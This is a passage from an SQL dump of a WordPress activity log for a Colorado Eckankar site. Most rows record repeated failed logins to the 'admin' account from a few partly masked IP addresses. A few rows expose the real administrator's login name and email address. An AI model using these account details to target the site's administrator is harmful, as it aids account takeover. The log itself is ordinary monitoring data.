AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(221935,36902,'_message_key','user_unknown_login_failed'),(221936,36902,'_server_remote_addr','51.38.52.x'),(221937,36903,'failed_username','admin'),(221938,36903,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(221939,36903,'_message_key','user_unknown_login_failed'),(221940,36903,'_server_remote_addr','13.79.17.x'),(221941,36904,'failed_username','admin'),(221942,36904,'server_http_user_agent','Mozilla/5.0'),(221943,36904,'_message_key','user_unknown_login_failed'),(221944,36904,'_server_remote_addr','20.81.176.x'),(221945,36905,'failed_username','admin'),(221946,36905,'server_http_user_agent','Mozilla/5.0'),(221947,36905,'_message_key','user_unknown_login_failed'),(221948,36905,'_server_remote_addr','45.136.118.x'),(221949,36906,'failed_username','admin'),(221950,36906,'server_http_user_agent','Mozilla/5.0'),(221951,36906,'_message_key','user_unknown_login_failed'),(221952,36906,'_server_remote_addr','45.136.118.x'),(221953,36907,'failed_username','admin'),(221954,36907,'server_http_user_agent','Mozilla/5.0'),(221955,36907,'_message_key','user_unknown_login_failed'),(221956,36907,'_server_remote_addr','20.81.176.x'),(221957,36908,'failed_username','admin'),(221958,36908,'server_http_user_agent','Mozilla/5.0'),(221959,36908,'_message_key','user_unknown_login_failed'),(221960,36908,'_server_remote_addr','45.136.118.x'),(221961,36909,'failed_username','admin'),(221962,36909,'server_http_user_agent','Mozilla/5.0'),(221963,36909,'_message_key','user_unknown_login_failed'),(221964,36909,'_server_remote_addr','20.81.176.x'),(221965,36910,'failed_username','admin'),(221966,36910,'server_http_user_agent','Mozilla/5.0'),(221967,36910,'_message_key','user_unknown_login_failed'),(221968,36910,'_server_remote_addr','45.136.118.x'),(221969,36911,'failed_username','admin'),(221970,36911,'server_http_user_agent','Mozilla/5.0'),(221971,36911,'_message_key','user_unknown_login_failed'),(221972,36911,'_server_remote_addr','20.81.176.x'),(221973,36912,'failed_username','admin'),(221974,36912,'server_http_user_agent','Mozilla/5.0'),(221975,36912,'_message_key','user_unknown_login_failed'),(221976,36912,'_server_remote_addr','45.136.118.x'),(221977,36913,'failed_username','admin'),(221978,36913,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(221979,36913,'_message_key','user_unknown_login_failed'),(221980,36913,'_server_remote_addr','133.130.103.x'),(221981,36914,'failed_username','admin'),(221982,36914,'server_http_user_agent','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(221983,36914,'_message_key','user_unknown_login_failed'),(221984,36914,'_server_remote_addr','20.92.138.x'),(221985,36915,'failed_username','admin'),(221986,36915,'server_http_user_agent','Mozilla/5.0'),(221987,36915,'_message_key','user_unknown_login_failed'),(221988,36915,'_server_remote_addr','20.81.176.x'),(221989,36916,'failed_username','admin'),(221990,36916,'server_http_user_agent','Mozilla/5.0'),(221991,36916,'_message_key','user_unknown_login_failed'),(221992,36916,'_server_remote_addr','45.136.118.x'),(221993,36917,'failed_username','admin'),(221994,36917,'server_http_user_agent','Mozilla/5.0'),(221995,36917,'_message_key','user_unknown_login_failed'),(221996,36917,'_server_remote_addr','45.136.118.x'),(221997,36918,'failed_username','admin'),(221998,36918,'server_http_user_agent','Mozilla/5.0'),(221999,36918,'_message_key','user_unknown_login_failed'),(222000,36918,'_server_remote_addr','20.81.176.x'),(222001,36919,'failed_username','admin'),(222002,36919,'server_http_user_agent','Mozilla/5.0'),(222003,36919,'_message_key','user_unknown_login_failed'),(222004,36919,'_server_remote_addr','45.136.118.x'),(222005,36920,'failed_username','admin'),(222006,36920,'server_http_user_agent','Mozilla/5.0'),(222007,36920,'_message_key','user_unknown_login_failed'),(222008,36920,'_server_remote_addr','20.81.176.x'),(222009,36921,'failed_username','admin'),(222010,36921,'server_http_user_agent','Mozilla/5.0'),(222011,36921,'_message_key','user_unknown_login_failed'),(222012,36921,'_server_remote_addr','45.136.118.x'),(222013,36922,'failed_username','admin'),(222014,36922,'server_http_user_agent','Mozilla/5.0'),(222015,36922,'_message_key','user_unknown_login_failed'),(222016,36922,'_server_remote_addr','20.81.176.x'),(222017,36923,'failed_username','admin'),(222018,36923,'server_http_user_agent','Mozilla/5.0'),(222019,36923,'_message_key','user_unknown_login_failed'),(222020,36923,'_server_remote_addr','45.136.118.x'),(222021,36924,'failed_username','admin'),(222022,36924,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(222023,36924,'_message_key','user_unknown_login_failed'),(222024,36924,'_server_remote_addr','156.67.76.x'),(222025,36925,'failed_username','admin'),(222026,36925,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(222027,36925,'_message_key','user_unknown_login_failed'),(222028,36925,'_server_remote_addr','47.107.131.x'),(222029,36926,'failed_username','admin'),(222030,36926,'server_http_user_agent','Mozilla/5.0'),(222031,36926,'_message_key','user_unknown_login_failed'),(222032,36926,'_server_remote_addr','20.81.176.x'),(222033,36927,'failed_username','admin'),(222034,36927,'server_http_user_agent','Mozilla/5.0'),(222035,36927,'_message_key','user_unknown_login_failed'),(222036,36927,'_server_remote_addr','45.136.118.x'),(222037,36928,'failed_username','admin'),(222038,36928,'server_http_user_agent','Mozilla/5.0'),(222039,36928,'_message_key','user_unknown_login_failed'),(222040,36928,'_server_remote_addr','45.136.118.x'),(222041,36929,'failed_username','admin'),(222042,36929,'server_http_user_agent','Mozilla/5.0'),(222043,36929,'_message_key','user_unknown_login_failed'),(222044,36929,'_server_remote_addr','20.81.176.x'),(222045,36930,'failed_username','admin'),(222046,36930,'server_http_user_agent','Mozilla/5.0'),(222047,36930,'_message_key','user_unknown_login_failed'),(222048,36930,'_server_remote_addr','45.136.118.x'),(222049,36931,'failed_username','admin'),(222050,36931,'server_http_user_agent','Mozilla/5.0'),(222051,36931,'_message_key','user_unknown_login_failed'),(222052,36931,'_server_remote_addr','20.81.176.x'),(222053,36932,'failed_username','admin'),(222054,36932,'server_http_user_agent','Mozilla/5.0'),(222055,36932,'_message_key','user_unknown_login_failed'),(222056,36932,'_server_remote_addr','45.136.118.x'),(222057,36933,'failed_username','admin'),(222058,36933,'server_http_user_agent','Mozilla/5.0'),(222059,36933,'_message_key','user_unknown_login_failed'),(222060,36933,'_server_remote_addr','20.81.176.x'),(222061,36934,'failed_username','admin'),(222062,36934,'server_http_user_agent','Mozilla/5.0'),(222063,36934,'_message_key','user_unknown_login_failed'),(222064,36934,'_server_remote_addr','20.81.176.x'),(222065,36935,'failed_username','admin'),(222066,36935,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(222067,36935,'_message_key','user_unknown_login_failed'),(222068,36935,'_server_remote_addr','186.87.69.x'),(222069,36936,'failed_username','admin'),(222070,36936,'server_http_user_agent','Mozilla/5.0'),(222071,36936,'_message_key','user_unknown_login_failed'),(222072,36936,'_server_remote_addr','45.136.118.x'),(222073,36937,'failed_username','admin'),(222074,36937,'server_http_user_agent','Mozilla/5.0'),(222075,36937,'_message_key','user_unknown_login_failed'),(222076,36937,'_server_remote_addr','20.81.176.x'),(222077,36938,'failed_username','admin'),(222078,36938,'server_http_user_agent','Mozilla/5.0'),(222079,36938,'_message_key','user_unknown_login_failed'),(222080,36938,'_server_remote_addr','45.136.118.x'),(222081,36939,'failed_username','admin'),(222082,36939,'server_http_user_agent','Mozilla/5.0'),(222083,36939,'_message_key','user_unknown_login_failed'),(222084,36939,'_server_remote_addr','45.136.118.x'),(222085,36940,'failed_username','admin'),(222086,36940,'server_http_user_agent','Mozilla/5.0'),(222087,36940,'_message_key','user_unknown_login_failed'),(222088,36940,'_server_remote_addr','20.81.176.x'),(222089,36941,'failed_username','admin'),(222090,36941,'server_http_user_agent','Mozilla/5.0'),(222091,36941,'_message_key','user_unknown_login_failed'),(222092,36941,'_server_remote_addr','45.136.118.x'),(222093,36942,'failed_username','admin'),(222094,36942,'server_http_user_agent','Mozilla/5.0'),(222095,36942,'_message_key','user_unknown_login_failed'),(222096,36942,'_server_remote_addr','20.81.176.x'),(222097,36943,'failed_username','admin'),(222098,36943,'server_http_user_agent','Mozilla/5.0'),(222099,36943,'_message_key','user_unknown_login_failed'),(222100,36943,'_server_remote_addr','45.136.118.x'),(222101,36944,'failed_username','admin'),(222102,36944,'server_http_user_agent','Mozilla/5.0'),(222103,36944,'_message_key','user_unknown_login_failed'),(222104,36944,'_server_remote_addr','20.81.176.x'),(222105,36945,'failed_username','admin'),(222106,36945,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(222107,36945,'_message_key','user_unknown_login_failed'),(222108,36945,'_server_remote_addr','106.15.38.x'),(222109,36946,'failed_username','admin'),(222110,36946,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(222111,36946,'_message_key','user_unknown_login_failed'),(222112,36946,'_server_remote_addr','94.23.61.x'),(222113,36947,'failed_username','admin'),(222114,36947,'server_http_user_agent','Mozilla/5.0'),(222115,36947,'_message_key','user_unknown_login_failed'),(222116,36947,'_server_remote_addr','45.136.118.x'),(222117,36948,'failed_username','admin'),(222118,36948,'server_http_user_agent','Mozilla/5.0'),(222119,36948,'_message_key','user_unknown_login_failed'),(222120,36948,'_server_remote_addr','20.81.176.x'),(222121,36949,'failed_username','admin'),(222122,36949,'server_http_user_agent','Mozilla/5.0'),(222123,36949,'_message_key','user_unknown_login_failed'),(222124,36949,'_server_remote_addr','45.136.118.x'),(222125,36950,'failed_username','admin'),(222126,36950,'server_http_user_agent','Mozilla/5.0'),(222127,36950,'_message_key','user_unknown_login_failed'),(222128,36950,'_server_remote_addr','45.136.118.x'),(222129,36951,'failed_username','admin'),(222130,36951,'server_http_user_agent','Mozilla/5.0'),(222131,36951,'_message_key','user_unknown_login_failed'),(222132,36951,'_server_remote_addr','20.81.176.x'),(222133,36952,'failed_username','admin'),(222134,36952,'server_http_user_agent','Mozilla/5.0'),(222135,36952,'_message_key','user_unknown_login_failed'),(222136,36952,'_server_remote_addr','45.136.118.x'),(222137,36953,'failed_username','admin'),(222138,36953,'server_http_user_agent','Mozilla/5.0'),(222139,36953,'_message_key','user_unknown_login_failed'),(222140,36953,'_server_remote_addr','20.81.176.x'),(222141,36954,'failed_username','admin'),(222142,36954,'server_http_user_agent','Mozilla/5.0'),(222143,36954,'_message_key','user_unknown_login_failed'),(222144,36954,'_server_remote_addr','45.136.118.x'),(222145,36955,'failed_username','admin'),(222146,36955,'server_http_user_agent','Mozilla/5.0'),(222147,36955,'_message_key','user_unknown_login_failed'),(222148,36955,'_server_remote_addr','20.81.176.x'),(222149,36956,'failed_username','admin'),(222150,36956,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(222151,36956,'_message_key','user_unknown_login_failed'),(222152,36956,'_server_remote_addr','86.107.198.x'),(222153,36957,'failed_username','admin'),(222154,36957,'server_http_user_agent','Mozilla/5.0'),(222155,36957,'_message_key','user_unknown_login_failed'),(222156,36957,'_server_remote_addr','45.136.118.x'),(222157,36958,'failed_username','admin'),(222158,36958,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'),(222159,36958,'_message_key','user_unknown_login_failed'),(222160,36958,'_server_remote_addr','106.52.91.x'),(222161,36959,'failed_username','admin'),(222162,36959,'server_http_user_agent','Mozilla/5.0'),(222163,36959,'_message_key','user_unknown_login_failed'),(222164,36959,'_server_remote_addr','20.81.176.x'),(222165,36960,'failed_username','admin'),(222166,36960,'server_http_user_agent','Mozilla/5.0'),(222167,36960,'_message_key','user_unknown_login_failed'),(222168,36960,'_server_remote_addr','45.136.118.x'),(222169,36961,'failed_username','admin'),(222170,36961,'server_http_user_agent','Mozilla/5.0'),(222171,36961,'_message_key','user_unknown_login_failed'),(222172,36961,'_server_remote_addr','20.81.176.x'),(222173,36962,'failed_username','admin'),(222174,36962,'server_http_user_agent','Mozilla/5.0'),(222175,36962,'_message_key','user_unknown_login_failed'),(222176,36962,'_server_remote_addr','45.136.118.x'),(222177,36963,'failed_username','admin'),(222178,36963,'server_http_user_agent','Mozilla/5.0'),(222179,36963,'_message_key','user_unknown_login_failed'),(222180,36963,'_server_remote_addr','45.136.118.x'),(222181,36964,'failed_username','admin'),(222182,36964,'server_http_user_agent','Mozilla/5.0'),(222183,36964,'_message_key','user_unknown_login_failed'),(222184,36964,'_server_remote_addr','20.81.176.x'),(222185,36965,'failed_username','admin'),(222186,36965,'server_http_user_agent','Mozilla/5.0'),(222187,36965,'_message_key','user_unknown_login_failed'),(222188,36965,'_server_remote_addr','45.136.118.x'),(222189,36966,'failed_username','admin'),(222190,36966,'server_http_user_agent','Mozilla/5.0'),(222191,36966,'_message_key','user_unknown_login_failed'),(222192,36966,'_server_remote_addr','20.81.176.x'),(222193,36967,'failed_username','admin'),(222194,36967,'server_http_user_agent','Mozilla/5.0'),(222195,36967,'_message_key','user_unknown_login_failed'),(222196,36967,'_server_remote_addr','45.136.118.x'),(222197,36968,'failed_username','admin'),(222198,36968,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(222199,36968,'_message_key','user_unknown_login_failed'),(222200,36968,'_server_remote_addr','185.18.197.x'),(222201,36969,'failed_username','admin'),(222202,36969,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(222203,36969,'_message_key','user_unknown_login_failed'),(222204,36969,'_server_remote_addr','94.23.61.x'),(222205,36970,'failed_username','admin'),(222206,36970,'server_http_user_agent','Mozilla/5.0'),(222207,36970,'_message_key','user_unknown_login_failed'),(222208,36970,'_server_remote_addr','20.81.176.x'),(222209,36971,'failed_username','admin'),(222210,36971,'server_http_user_agent','Mozilla/5.0'),(222211,36971,'_message_key','user_unknown_login_failed'),(222212,36971,'_server_remote_addr','45.136.118.x'),(222213,36972,'post_id','269190'),(222214,36972,'post_type','nf_sub'),(222215,36972,'post_title',''),(222216,36972,'_message_key','post_updated'),(222217,36972,'_server_remote_addr','76.155.45.x'),(222218,36972,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(222219,36973,'post_id','269191'),(222220,36973,'post_type','nf_sub'),(222221,36973,'post_title',''),(222222,36973,'_message_key','post_updated'),(222223,36973,'_server_remote_addr','76.155.45.x'),(222224,36973,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(222225,36974,'failed_username','admin'),(222226,36974,'server_http_user_agent','Mozilla/5.0'),(222227,36974,'_message_key','user_unknown_login_failed'),(222228,36974,'_server_remote_addr','45.136.118.x'),(222229,36975,'failed_username','admin'),(222230,36975,'server_http_user_agent','Mozilla/5.0'),(222231,36975,'_message_key','user_unknown_login_failed'),(222232,36975,'_server_remote_addr','20.81.176.x'),(222233,36976,'failed_username','admin'),(222234,36976,'server_http_user_agent','Mozilla/5.0'),(222235,36976,'_message_key','user_unknown_login_failed'),(222236,36976,'_server_remote_addr','45.136.118.x'),(222237,36977,'failed_username','admin'),(222238,36977,'server_http_user_agent','Mozilla/5.0'),(222239,36977,'_message_key','user_unknown_login_failed'),(222240,36977,'_server_remote_addr','20.81.176.x'),(222241,36978,'failed_username','admin'),(222242,36978,'server_http_user_agent','Mozilla/5.0'),(222243,36978,'_message_key','user_unknown_login_failed'),(222244,36978,'_server_remote_addr','45.136.118.x'),(222245,36979,'failed_username','admin'),(222246,36979,'server_http_user_agent','Mozilla/5.0'),(222247,36979,'_message_key','user_unknown_login_failed'),(222248,36979,'_server_remote_addr','20.81.176.x'),(222249,36980,'failed_username','admin'),(222250,36980,'server_http_user_agent','Mozilla/5.0'),(222251,36980,'_message_key','user_unknown_login_failed'),(222252,36980,'_server_remote_addr','45.136.118.x'),(222253,36981,'failed_username','admin'),(222254,36981,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(222255,36981,'_message_key','user_unknown_login_failed'),(222256,36981,'_server_remote_addr','147.135.255.x'),(222257,36982,'failed_username','admin'),(222258,36982,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(222259,36982,'_message_key','user_unknown_login_failed'),(222260,36982,'_server_remote_addr','159.223.222.x'),(222261,36983,'failed_username','admin'),(222262,36983,'server_http_user_agent','Mozilla/5.0'),(222263,36983,'_message_key','user_unknown_login_failed'),(222264,36983,'_server_remote_addr','20.81.176.x'),(222265,36984,'failed_username','admin'),(222266,36984,'server_http_user_agent','Mozilla/5.0'),(222267,36984,'_message_key','user_unknown_login_failed'),(222268,36984,'_server_remote_addr','45.136.118.x'),(222269,36985,'user_id','2'),(222270,36985,'user_email','nada@zipnadanot.org'),(222271,36985,'user_login','S8zhaBda'),(222272,36985,'_user_id','2'),(222273,36985,'_user_login','S8zhaBda'),(222274,36985,'_user_email','nada@zipnadanot.org'),(222275,36985,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(222276,36985,'_message_key','user_logged_in'),(222277,36985,'_server_remote_addr','76.130.120.x'),(222278,36985,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(222279,36986,'failed_username','admin'),(222280,36986,'server_http_user_agent','Mozilla/5.0'),(222281,36986,'_message_key','user_unknown_login_failed'),(222282,36986,'_server_remote_addr','45.136.118.x'),(222283,36987,'failed_username','admin'),(222284,36987,'server_http_user_agent','Mozilla/5.0'),(222285,36987,'_message_key','user_unknown_login_failed'),(222286,36987,'_server_remote_addr','20.81.176.x'),(222287,36988,'failed_username','admin'),(222288,36988,'server_http_user_agent','Mozilla/5.0'),(222289,36988,'_message_key','user_unknown_login_failed'),(222290,36988,'_server_remote_addr','45.136.118.x'),(222291,36989,'failed_username','admin'),(222292,36989,'server_http_user_agent','Mozilla/5.0'),(222293,36989,'_message_key','user_unknown_login_failed'),(222294,36989,'_server_remote_addr','45.136.118.x'),(222295,36990,'failed_username','admin'),(222296,36990,'server_http_user_agent','Mozilla/5.0'),(222297,36990,'_message_key','user_unknown_login_failed'),(222298,36990,'_server_remote_addr','45.136.118.x'),(222299,36991,'failed_username','admin'),(222300,36991,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(222301,36991,'_message_key','user_unknown_login_failed'),(222302,36991,'_server_remote_addr','186.87.69.x'),(222303,36992,'failed_username','admin'),(222304,36992,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36'),(222305,36992,'_message_key','user_unknown_login_failed'),(222306,36992,'_server_remote_addr','85.90.245.x'),(222307,36993,'failed_username','admin'),(222308,36993,'server_http_user_agent','Mozilla/5.0'),(222309,36993,'_message_key','user_unknown_login_failed'),(222310,36993,'_server_remote_addr','45.136.118.x'),(222311,36994,'post_id','269193'),(222312,36994,'post_type','nf_sub'),(222313,36994,'post_title',''),(222314,36994,'_message_key','post_updated'),(222315,36994,'_server_remote_addr','75.68.251.x'),(222316,36994,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_News&utm_medium=email'),(222317,36995,'failed_username','admin'),(222318,36995,'server_http_user_agent','Mozilla/5.0'),(222319,36995,'_message_key','user_unknown_login_failed'),(222320,36995,'_server_remote_addr','45.136.118.x'),(222321,36996,'failed_username','admin'),(222322,36996,'server_http_user_agent','Mozilla/5.0'),(222323,36996,'_message_key','user_unknown_login_failed'),(222324,36996,'_server_remote_addr','45.136.118.x'),(222325,36997,'failed_username','insighteyecdev'),(222326,36997,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(222327,36997,'_message_key','user_unknown_login_failed'),(222328,36997,'_xmlrpc_request','true'),(222329,36997,'_server_remote_addr','45.38.33.x'),(222330,36998,'failed_username','admin'),(222331,36998,'server_http_user_agent','Mozilla/5.0'),(222332,36998,'_message_key','user_unknown_login_failed'),(222333,36998,'_server_remote_addr','45.136.118.x'),(222334,36999,'failed_username','admin'),(222335,36999,'server_http_user_agent','Mozilla/5.0'),(222336,36999,'_message_key','user_unknown_login_failed'),(222337,36999,'_server_remote_addr','45.136.118.x'),(222338,37000,'failed_username','admin'),(222339,37000,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(222340,37000,'_message_key','user_unknown_login_failed'),(222341,37000,'_server_remote_addr','149.91.122.x'),(222342,37001,'failed_username','admin'),(222343,37001,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(222344,37001,'_message_key','user_unknown_login_failed'),(222345,37001,'_server_remote_addr','156.54.11.x'),(222346,37002,'failed_username','admin'),(222347,37002,'server_http_user_agent','Mozilla/5.0'),(222348,37002,'_message_key','user_unknown_login_failed'),(222349,37002,'_server_remote_addr','45.136.118.x'),(222350,37003,'failed_username','admin'),(222351,37003,'server_http_user_agent','Mozilla/5.0'),(222352,37003,'_message_key','user_unknown_login_failed'),(222353,37003,'_server_remote_addr','45.136.118.x'),(222354,37004,'failed_username','admin'),(222355,37004,'server_http_user_agent','Mozilla/5.0'),(222356,37004,'_message_key','user_unknown_login_failed'),(222357,37004,'_server_remote_addr','45.136.118.x'),(222358,37005,'failed_username','admin'),(222359,37005,'server_http_user_agent','Mozilla/5.0'),(222360,37005,'_message_key','user_unknown_login_failed'),(222361,37005,'_server_remote_addr','45.136.118.x'),(222362,37006,'failed_username','admin'),(222363,37006,'server_http_user_agent','Mozilla/5.0'),(222364,37006,'_message_key','user_unknown_login_failed'),(222365,37006,'_server_remote_addr','45.136.118.x'),(222366,37007,'failed_username','admin'),(222367,37007,'server_http_user_agent','Mozilla/5.0'),(222368,37007,'_message_key','user_unknown_login_failed'),(222369,37007,'_server_remote_addr','45.136.118.x'),(222370,37008,'failed_username','admin'),(222371,37008,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(222372,37008,'_message_key','user_unknown_login_failed'),(222373,37008,'_server_remote_addr','149.91.122.x'),(222374,37009,'failed_username','admin'),(222375,37009,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36'),(222376,37009,'_message_key','user_unknown_login_failed'),(222377,37009,'_server_remote_addr','52.140.17.x'),(222378,37010,'failed_username','admin'),(222379,37010,'server_http_user_agent','Mozilla/5.0'),(222380,37010,'_message_key','user_unknown_login_failed'),(222381,37010,'_server_remote_addr','45.136.118.x'),(222382,37011,'failed_username','admin'),(222383,37011,'server_http_user_agent','Mozilla/5.0'),(222384,37011,'_message_key','user_unknown_login_failed'),(222385,37011,'_server_remote_addr','45.136.118.x'),(222386,37012,'user_id','2'),(222387,37012,'user_email','nada@zipnadanot.org'),(222388,37012,'user_login','S8zhaBda'),(222389,37012,'_user_id','2'),(222390,37012,'_user_login','S8zhaBda'),(222391,37012,'_user_email','nada@zipnadanot.org'),(222392,37012,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(222393,37012,'_message_key','user_logged_in'),(222394,37012,'_server_remote_addr','76.130.120.x'),(222395,37012,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(222396,37013,'failed_username','admin'),(222397,37013,'server_http_user_agent','Mozilla/5.0'),(222398,37013,'_message_key','user_unknown_login_failed'),(222399,37013,'_server_remote_addr','45.136.118.x'),(222400,37014,'_user_id','2'),(222401,37014,'_user_login','S8zhaBda'),(222402,37014,'_user_email','nada@zipnadanot.org'),(222403,37014,'_message_key','user_logged_out'),(222404,37014,'_server_remote_addr','76.130.120.x'),(222405,37014,'_server_http_referer','https://eckankar-colorado.org/wp-admin/options-general.php?page=really-simple-security'),(222406,37015,'failed_username','admin'),(222407,37015,'server_http_user_agent','Mozilla/5.0'),(222408,37015,'_message_key','user_unknown_login_failed'),(222409,37015,'_server_remote_addr','45.136.118.x'),(222410,37016,'failed_username','admin'),(222411,37016,'server_http_user_agent','Mozilla/5.0'),(222412,37016,'_message_key','user_unknown_login_failed'),(222413,37016,'_server_remote_addr','45.136.118.x'),(222414,37017,'failed_username','admin'),(222415,37017,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(222416,37017,'_message_key','user_unknown_login_failed'),(222417,37017,'_server_remote_addr','157.230.191.x'),(222418,37018,'failed_username','admin'),(222419,37018,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(222420,37018,'_message_key','user_unknown_login_failed'),(222421,37018,'_server_remote_addr','51.38.52.x'),(222422,37019,'failed_username','admin'),(222423,37019,'server_http_user_agent','Mozilla/5.0'),(222424,37019,'_message_key','user_unknown_login_failed'),(222425,37019,'_server_remote_addr','45.136.118.x'),(222426,37020,'failed_username','admin'),(222427,37020,'server_http_user_agent','Mozilla/5.0'),(222428,37020,'_message_key','user_unknown_login_failed'),(222429,37020,'_server_remote_addr','45.136.118.x'),(222430,37021,'failed_username','admin'),(222431,37021,'server_http_user_agent','Mozilla/5.0'),(222432,37021,'_message_key','user_unknown_login_failed'),(222433,37021,'_server_remote_addr','45.136.118.x'),(222434,37022,'failed_username','admin'),(222435,37022,'server_http_user_agent','Mozilla/5.0'),(222436,37022,'_message_key','user_unknown_login_failed'),(222437,37022,'_server_remote_addr','45.136.118.x'),(222438,37023,'failed_username','admin'),(222439,37023,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(222440,37023,'_message_key','user_unknown_login_failed'),(222441,37023,'_xmlrpc_request','true'),(222442,37023,'_server_remote_addr','20.150.208.x'),(222443,37024,'failed_username','admin'),(222444,37024,'server_http_user_agent','Mozilla/5.0'),(222445,37024,'_message_key','user_unknown_login_failed'),(222446,37024,'_server_remote_addr','45.136.118.x'),(222447,37025,'failed_username','admin'),(222448,37025,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(222449,37025,'_message_key','user_unknown_login_failed'),(222450,37025,'_server_remote_addr','165.227.89.x'),(222451,37026,'failed_username','admin'),(222452,37026,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(222453,37026,'_message_key','user_unknown_login_failed'),(222454,37026,'_server_remote_addr','13.200.64.x'),(222455,37027,'failed_username','admin'),(222456,37027,'server_http_user_agent','Mozilla/5.0'),(222457,37027,'_message_key','user_unknown_login_failed'),(222458,37027,'_server_remote_addr','45.136.118.x'),(222459,37028,'failed_username','admin'),(222460,37028,'server_http_user_agent','Mozilla/5.0'),(222461,37028,'_message_key','user_unknown_login_failed'),(222462,37028,'_server_remote_addr','45.136.118.x'),(222463,37029,'failed_username','admin'),(222464,37029,'server_http_user_agent','Mozilla/5.0'),(222465,37029,'_message_key','user_unknown_login_failed'),(222466,37029,'_server_remote_addr','45.136.118.x'),(222467,37030,'failed_username','admin'),(222468,37030,'server_http_user_agent','Mozilla/5.0'),(222469,37030,'_message_key','user_unknown_login_failed'),(222470,37030,'_server_remote_addr','45.136.118.x'),(222471,37031,'failed_username','admin'),(222472,37031,'server_http_user_agent','Mozilla/5.0'),(222473,37031,'_message_key','user_unknown_login_failed'),(222474,37031,'_server_remote_addr','45.136.118.x'),(222475,37032,'failed_username','admin'),(222476,37032,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 